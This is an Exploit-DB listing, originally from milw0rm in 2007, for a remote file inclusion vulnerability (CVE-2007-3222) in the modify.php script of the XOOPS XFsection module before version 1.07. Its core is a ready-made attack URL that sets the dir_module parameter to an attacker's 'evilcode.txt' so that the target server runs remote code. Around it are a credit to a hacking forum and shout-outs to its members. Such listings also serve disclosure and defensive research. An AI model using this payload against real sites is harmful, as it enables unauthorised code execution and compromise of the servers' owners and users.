XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability



EDB-ID: 4068 CVE: 2007-3222OSVDB-ID: 36815
Author: Sp[L]o1TPublished: 2007-06-13Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module XFsection Remote File Inclusion
version: < 1.07
source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note:
In some cases you will need to be authenticated.
# milw0rm.com [2007-06-13]






Comments

No comments so far